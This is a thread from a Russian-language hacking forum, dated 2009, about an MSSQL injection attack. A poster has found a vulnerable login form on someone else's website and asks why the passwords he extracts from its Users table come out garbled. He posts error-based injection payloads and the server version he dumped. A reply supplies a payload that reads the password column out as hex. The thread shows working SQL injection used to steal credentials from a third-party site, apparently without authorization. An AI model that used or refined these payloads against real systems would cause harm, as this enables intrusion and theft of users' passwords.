ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

mssql injection
  #1  
Старый 01.08.2009, 00:25
Аватар для Moerto
Moerto
Новичок
Регистрация: 22.07.2009
Сообщений: 7
Провел на форуме:
19852

Репутация: 0
По умолчанию mssql injection

Привет, у меня проблема с mssql инйэкцию. Я в один сайт нашол "vulnerable" (ньезнаю как ето сказать по руски) логин форму. Я палучил юзернеими и другую информацию от датабази с такие команди:
Код:
' and 1=convert(int, (select top 1...))--
Когда я хачу палучиц парольи с такую методу я палучаю такие парольи - ÅÆÅÆ .
Код:
' and 1=convert(varchar, (select top 1 Password from Users where Username='foundusername'))--
Код:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'  [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'ª·¨©»¯ ' to a column of data type int.
Парольи можно быть в арабиц енкодинг, я попробовал поменьять бровсер енкодинг и без прогреса. Спасибо.
P.S. Я неоченъ харашо гаварю по руски, извиньице.
 
Ответить с цитированием

  #2  
Старый 01.08.2009, 00:39
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере
это у всех юзеров так пароли выглядят?
 
Ответить с цитированием

  #3  
Старый 01.08.2009, 01:24
Аватар для Moerto
Moerto
Новичок
Регистрация: 22.07.2009
Сообщений: 7
Провел на форуме:
19852

Репутация: 0
По умолчанию

дa
 
Ответить с цитированием

  #4  
Старый 01.08.2009, 06:39
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Spyder  
вообще если даже в арабской кодировке пароли то они должны нормально отображаться в браузере
это у всех юзеров так пароли выглядят?
Кстати часто очень бывает что абра кадабра вылазиет.
Тот же эллементарный 1' or 1=@@version.
Вроде слов много вылазиет, но абра кадабра.
Может знаешь что в чём проблема?
 
Ответить с цитированием

  #5  
Старый 01.08.2009, 19:10
Аватар для Moerto
Moerto
Новичок
Регистрация: 22.07.2009
Сообщений: 7
Провел на форуме:
19852

Репутация: 0
По умолчанию

Microsoft SQL Server 2000 -

8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.2

(Build 3790: Service Pack 1)
 
Ответить с цитированием

  #6  
Старый 02.08.2009, 05:51
Аватар для _>SubDeviL<_
_>SubDeviL<_
Познающий
Регистрация: 22.06.2008
Сообщений: 53
Провел на форуме:
355530

Репутация: 11
По умолчанию

select+top+1+sys.fn_varbintohexstr(password)+from+ Users+where+Username="foundusername"

юзай так, тобишь функцию sys.fn_varbintohexstr().
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
mssql injection pop_korn Video.Antichat 0 07.02.2007 14:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ